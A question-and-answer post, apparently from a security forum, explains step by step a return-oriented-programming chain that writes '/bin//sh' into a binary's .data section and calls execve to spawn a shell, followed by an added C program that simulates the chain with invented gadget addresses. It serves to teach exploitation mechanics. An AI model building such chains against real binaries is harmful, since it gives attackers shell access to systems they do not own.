Automatic exploitation via return oriented programming


Question

I need help understanding what is going on in this image: .

What I fail to see is what the @ .data instructions accomplish in combination with the mov dword ptr [edx], eax, especially considering that edx is popped right after.

Answer

In short, the @ .data lines refer to writable memory that is used to write the "/bin//sh" string, which is later executed. The .data section is just a readable/writable section of the executable that is loaded into memory, typically used to store global variables.

Here's a breakdown of how the ROP chain works:

pop edx ; ret
@ .data

These two gadgets pop the address of the .data section into edx.

pop eax ; ret
'/bin'

These gadgets pop 0x6e69622f, the first four characters of the /bin//sh string, into eax.

mov dword ptr [edx], eax ; ret

Then this writes the contents of eax to the address in edx; at this point the first four characters of the string have been written at the beginning of the .data section.

pop edx ; ret
@ .data + 4

pop eax ; ret
'//sh'

mov dword ptr [edx], eax ; ret

This part does the exact same thing to write the next four bytes of the string.

pop edx ; ret
@ .data + 8

xor eax, eax ; ret

mov dword ptr [edx], eax ; ret

And then this writes four null bytes after the string to null-terminate it.

pop ebx ; ret
@ .data

This sets ebx.

pop ecx ; pop ebx ; ret
@ .data + 8
padding without overwrite ebx

This writes .data+8 to ecx and writes .data to ebx. (Notice that the third line here is 0x080f4060, which we can see is the same address as .data three lines above.)

pop edx ; ret
@ .data + 8

This writes .data+8 to edx.

xor eax, eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret

This sets eax to 11.

int 0x80

This executes a system call on Linux. Here is a great resource for understanding system calls. We see that when eax is 11 (0xb), it is a call to execve, which is defined as follows:

int execve(const char *filename, char *const argv[], char *const envp[]);

So then ebx is filename, ecx is argv, and edx is envp. At this point, ebx points to the string /bin//sh, and both ecx and edx are .data+8. They are both treated as strings, but since .data+8 contains the null byte, ecx and edx are the empty string. So the call is essentially execve("/bin//sh", "", "");
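Added example, not part of the question or the answer above: a small C model of the chain that walks the gadget words exactly as the real stack would be consumed (each ret pops the next gadget address, each gadget pops its own operands, the mov stores through edx into a mock .data window) and then checks the register and memory state that int 0x80 would see. The .data address is the 0x080f4060 quoted in the answer; the gadget addresses and the 64-byte .data window are assumptions made for this example, since the original binary is not available. One caveat worth knowing when reading the answer: the kernel treats ecx and edx as pointers to NUL-terminated arrays of char*, so the zero dword at .data+8 makes argv and envp empty arrays rather than empty strings; the resulting execve of /bin//sh is the same.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* .data address quoted in the answer; the 64-byte window is the only
 * target memory this constructed mock models (assumption). */
#define DATA_ADDR 0x080f4060u
#define DATA_SIZE 64u

/* Gadget addresses are made up for this example; a real chain takes them
 * from a gadget finder run against the target binary. */
enum {
    G_POP_EDX_RET     = 0x0806e000, /* pop edx ; ret */
    G_POP_EAX_RET     = 0x080bd000, /* pop eax ; ret */
    G_MOV_PEDX_EAX    = 0x08055000, /* mov dword ptr [edx], eax ; ret */
    G_XOR_EAX_RET     = 0x08049000, /* xor eax, eax ; ret */
    G_POP_EBX_RET     = 0x080481c9, /* pop ebx ; ret */
    G_POP_ECX_EBX_RET = 0x0806f000, /* pop ecx ; pop ebx ; ret */
    G_INC_EAX_RET     = 0x0807a000, /* inc eax ; ret */
    G_INT80           = 0x08049400  /* int 0x80 */
};

struct cpu {
    uint32_t eax, ebx, ecx, edx;
    const uint32_t *sp, *sp_end;  /* fake esp walking over the chain words */
    uint8_t data[DATA_SIZE];      /* contents of the mock .data window */
    int faulted;
};

/* Little-endian dword for a 4-byte string, e.g. pack4("/bin") == 0x6e69622f. */
static uint32_t pack4(const char *s) {
    return (uint32_t)(uint8_t)s[0] | (uint32_t)(uint8_t)s[1] << 8 |
           (uint32_t)(uint8_t)s[2] << 16 | (uint32_t)(uint8_t)s[3] << 24;
}

/* Store through edx. Only .data is writable in this model: a store anywhere
 * else is the fault a chain aimed at .text or .rodata would take. */
static int write_dword(struct cpu *c, uint32_t addr, uint32_t val) {
    if (addr < DATA_ADDR || addr + 4 > DATA_ADDR + DATA_SIZE) { c->faulted = 1; return 0; }
    uint8_t *p = &c->data[addr - DATA_ADDR];
    p[0] = val & 0xff; p[1] = (val >> 8) & 0xff; p[2] = (val >> 16) & 0xff; p[3] = val >> 24;
    return 1;
}

/* "pop": read the next stack word, faulting if the chain runs out. */
static uint32_t pop(struct cpu *c) {
    if (c->sp >= c->sp_end) { c->faulted = 1; return 0; }
    return *c->sp++;
}

/* Walk the chain: each ret pops the next gadget address, each gadget pops
 * its own operands. Returns 1 when int 0x80 is reached, 0 on a fault. */
static int run_chain(struct cpu *c, const uint32_t *chain, size_t n) {
    c->sp = chain; c->sp_end = chain + n;
    while (!c->faulted && c->sp < c->sp_end) {
        switch (pop(c)) {
        case G_POP_EDX_RET:     c->edx = pop(c); break;
        case G_POP_EAX_RET:     c->eax = pop(c); break;
        case G_POP_EBX_RET:     c->ebx = pop(c); break;
        case G_POP_ECX_EBX_RET: c->ecx = pop(c); c->ebx = pop(c); break;
        case G_MOV_PEDX_EAX:    write_dword(c, c->edx, c->eax); break;
        case G_XOR_EAX_RET:     c->eax = 0; break;
        case G_INC_EAX_RET:     c->eax++; break;
        case G_INT80:           return 1;
        default:                c->faulted = 1;  /* not a gadget address */
        }
    }
    return 0;
}

/* The chain from the answer, as the words that sit on the stack. */
static const uint32_t chain[] = {
    G_POP_EDX_RET, DATA_ADDR,
    G_POP_EAX_RET, 0x6e69622fu,                   /* '/bin' */
    G_MOV_PEDX_EAX,
    G_POP_EDX_RET, DATA_ADDR + 4,
    G_POP_EAX_RET, 0x68732f2fu,                   /* '//sh' */
    G_MOV_PEDX_EAX,
    G_POP_EDX_RET, DATA_ADDR + 8,
    G_XOR_EAX_RET,
    G_MOV_PEDX_EAX,                               /* NUL terminator */
    G_POP_EBX_RET, DATA_ADDR,
    G_POP_ECX_EBX_RET, DATA_ADDR + 8, DATA_ADDR,  /* "padding" must re-supply ebx */
    G_POP_EDX_RET, DATA_ADDR + 8,
    G_XOR_EAX_RET,
    G_INC_EAX_RET, G_INC_EAX_RET, G_INC_EAX_RET, G_INC_EAX_RET,
    G_INC_EAX_RET, G_INC_EAX_RET, G_INC_EAX_RET, G_INC_EAX_RET,
    G_INC_EAX_RET, G_INC_EAX_RET, G_INC_EAX_RET,  /* eax = 11 = __NR_execve */
    G_INT80
};

/* What the kernel sees at int 0x80: eax == 11 (execve), ebx -> "/bin//sh\0",
 * ecx and edx -> a zero dword, i.e. argv and envp are empty arrays. */
static int check_execve_state(const struct cpu *c) {
    return c->eax == 11 && c->ebx == DATA_ADDR &&
           memcmp(c->data, "/bin//sh\0\0\0\0", 12) == 0 &&
           c->ecx == DATA_ADDR + 8 && c->edx == DATA_ADDR + 8;
}

/* Run the chain above on a zeroed CPU and report whether it lands on a valid execve. */
static int run_demo(void) {
    struct cpu c; memset(&c, 0, sizeof c);
    return run_chain(&c, chain, sizeof chain / sizeof chain[0]) && check_execve_state(&c);
}

int main(void) {
    struct cpu c; memset(&c, 0, sizeof c);
    int ok = run_chain(&c, chain, sizeof chain / sizeof chain[0]) && check_execve_state(&c);
    printf("int 0x80 with eax=%u ebx=0x%08x ecx=0x%08x edx=0x%08x -> %s\n",
           c.eax, c.ebx, c.ecx, c.edx, ok ? "execve(\"/bin//sh\", {}, {})" : "bad state");
    printf(".data now holds \"%s\"\n", (const char *)c.data);
    return ok ? 0 : 1;
}
```

The "padding without overwrite ebx" word in the tool output is what the model makes concrete: because the only available ecx gadget is pop ecx ; pop ebx ; ret, the second pop would clobber ebx, so the chain supplies .data again in that slot rather than junk. Removing that word from the chain, or pointing a mov at an address outside .data, makes check_execve_state or write_dword fail, which is the quickest way to see why each word is there.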
